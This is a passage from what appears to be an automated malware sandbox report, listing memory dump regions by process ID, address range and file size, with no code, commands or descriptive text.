                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/908-200-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1088-181-0x0000012A8AC90000-0x0000012A8AD00000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    448KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1200-207-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1200-209-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    88KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1216-157-0x000001CC1B480000-0x000001CC1B4F0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    448KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1216-338-0x000001CC1BA10000-0x000001CC1BA80000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    448KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1292-189-0x000001DB90AD0000-0x000001DB90B40000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    448KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1292-334-0x000001DB90B60000-0x000001DB90BD0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    448KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1304-133-0x00007FF65DBE4060-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1304-174-0x000001819B370000-0x000001819B3E0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    448KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1336-132-0x0000029FB6E90000-0x0000029FB6E92000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1336-166-0x0000029FB7230000-0x0000029FB72A0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    448KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1336-319-0x0000029FB6E90000-0x0000029FB6E92000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1448-328-0x00000234832B0000-0x0000023483320000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    448KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1448-185-0x0000023482C40000-0x0000023482CB0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    448KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1672-116-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1872-361-0x0000000000402F68-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1900-330-0x00000236FF1C0000-0x00000236FF20B000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    300KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1900-187-0x00000236FF230000-0x00000236FF2A0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    448KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/1900-331-0x00000236FF7B0000-0x00000236FF820000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    448KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2052-230-0x00000000024D0000-0x00000000024D2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2052-241-0x00000000024D5000-0x00000000024D7000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2052-240-0x00000000024D4000-0x00000000024D5000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2052-239-0x00000000024D2000-0x00000000024D4000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2052-221-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2104-246-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2184-211-0x000001BB731F0000-0x000001BB7323B000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    300KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2184-212-0x000001BB73380000-0x000001BB733F0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    448KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2184-252-0x000001BB75A00000-0x000001BB75B01000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2184-204-0x00007FF65DBE4060-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2192-238-0x0000000000D72000-0x0000000000D74000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2192-242-0x0000000000D75000-0x0000000000D76000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2192-222-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2192-231-0x0000000000D70000-0x0000000000D72000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2316-245-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2536-177-0x00000273A7010000-0x00000273A7080000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    448KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2572-179-0x0000018CA98A0000-0x0000018CA9910000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    448KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2748-172-0x000001D431880000-0x000001D4318F0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    448KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2800-340-0x00000287E8230000-0x00000287E82A0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    448KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2800-158-0x00000287E77D0000-0x00000287E781B000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    300KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2800-163-0x00000287E7EA0000-0x00000287E7F10000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    448KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2820-169-0x000001BDD4D40000-0x000001BDD4DB0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    448KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2828-223-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2828-214-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3036-256-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3164-348-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3344-129-0x0000000000920000-0x000000000093C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    112KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3344-170-0x000000001B090000-0x000000001B092000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3344-126-0x0000000000200000-0x0000000000201000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3344-128-0x0000000000910000-0x0000000000911000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3344-130-0x0000000000940000-0x0000000000941000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3344-123-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3724-191-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3724-193-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    172KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3968-353-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4072-199-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4072-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4208-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4208-235-0x0000000000ED0000-0x0000000000EDD000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    52KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4212-277-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4256-250-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4396-341-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4460-343-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4772-272-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4772-259-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4772-273-0x00000000005C0000-0x00000000005D2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    72KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4780-251-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4780-350-0x00000000004163C6-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4964-262-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4972-275-0x0000000002DE0000-0x0000000002DE1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4972-263-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4972-274-0x00000000054D0000-0x00000000054D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4972-268-0x0000000000C80000-0x0000000000C81000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4992-253-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4992-357-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4992-257-0x00000000007D0000-0x00000000007D2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4992-287-0x00000000007D4000-0x00000000007D5000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5064-244-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5084-276-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5136-362-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5184-365-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5184-355-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5244-280-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5256-356-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5304-281-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5320-346-0x00000000004163C6-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5320-282-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5420-349-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5472-345-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5476-344-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5604-296-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5768-316-0x0000000005480000-0x0000000005481000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5768-304-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5780-351-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5808-352-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5856-311-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5916-366-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5928-313-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5972-359-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5976-367-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/6016-347-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/6040-363-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/6040-335-0x0000000004BB0000-0x0000000004C0C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    368KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/6040-327-0x0000000003055000-0x0000000003156000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/6040-317-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/6064-369-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/6068-364-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/6108-354-0x0000000000000000-mapping.dmp